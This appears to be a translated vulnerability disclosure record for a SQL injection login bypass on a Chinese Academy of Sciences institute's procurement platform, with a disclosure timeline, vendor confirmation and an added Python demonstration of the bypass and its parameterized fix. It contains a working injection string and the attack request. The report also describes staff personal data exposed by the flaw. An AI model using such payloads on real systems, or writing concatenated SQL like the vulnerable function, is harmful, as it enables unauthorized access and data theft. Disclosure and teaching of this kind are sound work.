2015-09-19: Details have been sent to the vendor and are awaiting its handling. 2015-09-21: CNCERT (National Internet Emergency Center) has not yet been able to contact the relevant unit; details are disclosed only to the reporting agency. 2015-10-01: Details disclosed to core white hats and experts in related fields. 2015-10-11: Details disclosed to regular white hats. 2015-10-21: Details disclosed to intern white hats. 2015-11-05: Details disclosed to the public.
I keep wondering where the world of big vendors is.
Procurement platform of the Shanghai Institutes for Biological Sciences, Chinese Academy of Sciences
http://**.**.**.**/pages/login.aspx
The user login is vulnerable to SQL injection: by crafting the account name and entering any password, authentication is bypassed and the backend is reached.
admin' or '1'='1
Through the injection it can be seen that the database holds a large amount of product data and institute personnel information.
http://**.**.**.**/pages/Login.aspx POST: __VIEWSTATE=[base64 ViewState blob omitted]&__EVENTVALIDATION=[blob omitted]&tbUserName=admin&tbPassword=123&btnLogin=%E7%99%BB%E5%BD%95
Injected parameter: tbUserName
Millions of product records, plus institute staff names, e-mail addresses, phone numbers, office locations and other details
Filter the input
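To show why the login accepts the crafted account name with an arbitrary password, and why binding parameters rather than just filtering closes the hole, here is an added illustration that is not part of the original report. It assumes a minimal in-memory users table (the real schema is unknown; only the field names tbUserName and tbPassword come from the report).

```python
import sqlite3


def make_db():
    # Constructed stand-in for the platform's user table (assumption).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'correct-horse')")
    db.commit()
    return db


def login_vulnerable(db, tbUserName, tbPassword):
    # Input is concatenated into the SQL text, so it becomes part of the grammar.
    # With tbUserName = "admin' or '1'='1" the WHERE clause parses as
    #   username = 'admin' OR ('1'='1' AND password = '...')
    # and the admin row matches regardless of the password.
    sql = ("SELECT COUNT(*) FROM users WHERE username = '" + tbUserName
           + "' AND password = '" + tbPassword + "'")
    return db.execute(sql).fetchone()[0] > 0


def login_parameterized(db, tbUserName, tbPassword):
    # Placeholders bind the input as data; the quote and OR are just characters
    # of a username that does not exist.
    sql = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (tbUserName, tbPassword)).fetchone()[0] > 0


if __name__ == "__main__":
    db = make_db()
    payload = "admin' or '1'='1"
    print("vulnerable:", login_vulnerable(db, payload, "123"))       # True
    print("parameterized:", login_parameterized(db, payload, "123")) # False
```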
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2015-09-21 16:23
CNVD has confirmed the described situation; it has been passed to CNCERT to notify the Chinese Academy of Sciences Computer Network Management Center, which will coordinate handling with the unit that administers the site.
None yet